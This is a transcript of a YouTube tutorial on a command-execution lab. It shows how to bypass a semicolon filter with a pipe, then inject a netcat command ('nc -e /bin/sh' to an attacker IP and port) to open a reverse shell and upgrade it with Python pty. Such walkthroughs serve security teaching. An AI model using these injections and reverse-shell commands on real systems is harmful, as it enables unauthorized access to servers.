Hey, welcome back to NethaxStark YouTube channel, and welcome back to the next video of command execution vulnerability. In the previous video I showed you how you guys can exploit a command execution vulnerability from a low level basically, and here's our web page which is infected, and now I'll show you the source code. So as you can see here in the source code, in the previous video basically we were able to exploit command execution vulnerability because it is not filtering any special characters. In that previous video we used semicolon, and as you can see here in the source code it is not filtering that. And if it will not filter that, then how an attacker can't be able to execute commands. Like if this is not filtering, then we'll be able to execute its commands, and that's why we exploited it from low level. And I'll tell you in the medium level, and I'll also tell you about how you guys can gain reverse shell. Okay, how you guys can upload reverse shell from command execution vulnerability. And the reverse shell we're gonna upload is netcat. I think you heard about netcat. If you don't, then I'll tell you in few minutes. So first of all, let's check the source code. And in the source code, as you can see here, it is basically filtering. Okay, as you can see, it is removing the special characters like and semicolon. So we use semicolon in the previous video, and as you can see here, it is filtering that. Okay, so we can't use semicolon this time, and that's why we'll use pipe. So if you don't know, this command execution vulnerability is present in Linux because that web server is of Linux, and in Linux there's a command which is this pipe. So what it'll do, I'll tell you, wait a second. So if we'll type ls and then we'll type the pipe, and if I will type here ifconfig. So what pipe will do, it will basically skip the first command. So the first command is ls. So if we'll type pipe and then we'll type next command, then it will basically skip the command and it will go to second command. So now if I'll press enter, then it will definitely show me the output of ifconfig. So as you can see, it is not showing me ls, so we'll use this. And as you can see here, it is not filtering that, pipe. Okay, so we're gonna use that. So here I'll type ping because it's giving me providing me service. And if I'll type a pipe and then I'll type ls, then it will basically show me the output of ls basically, sorry for that. And if I'll submit it now, as you can see here, it gave me output of ls, and will successfully be able to exploit the command execution vulnerability of medium level. Now I'll tell you how you guys can gain access from that. Okay, so what we'll do, we will use pipe in this case. Okay, and in the pipe we're gonna use netcat. So if you don't know what is netcat, then let me tell you. Netcat is a command. Wait a second, let me show you the manual of netcat. Okay, and netcat, and as you can see here, it is basically used for networking purposes, and I'll not read this. Okay, so what we're gonna do, we're gonna type netcat dash l. You can also type l and vp, but I'm just typing it combined. Okay, l and vp and 8080. So what this command will do, it will listen the traffic of 8080 port and verbose the output, and the port is 8080. So we combine these all commands, okay, into one single word. Okay, and we are intercepting the request, or basically trying to see the traffic on port 8080. Okay, so that's why we now we have to gain the reverse shell. Okay, so we're gonna type here nc for netcat dash e for what shell we want to use. So I want to use /bin/sh. Now I have to type my IP of that that attacker's IP address. So IP is 192.168.1.102, and now the port, so port is 8080. And you can also use the plugin, the extension basically, which is I think if you want to use this extension, you can type basically hacking tools, I think hacking extension, it will give you. And here you will also see the reverse shells netcat, as you can see, and you can also go on the web and check. So first of all we have to listen on this port. So I had enter, and if I'll submit it, as you can see, it connected me to the victim. Okay, so if I'll type here ls, then I am able to view the contents of web browser from a vulnerability which was in the website. Okay, so now if I want to use if I want to gain a fully interactive shell, then I can type python-c import pty. You know, if you are doing cybersecurity, or if you don't want to write it, you can also copy it from here. So that's all for this video. As you can see, here's the fully interactive command. We can basically copy it, and just we have to remove the 3 because Python 3 version is not available in this. And if you type, as you can see, we have now more interactive shell. Okay, and thank you for watching. So that's all for this video. I hope you will like this video and share this video with your friends.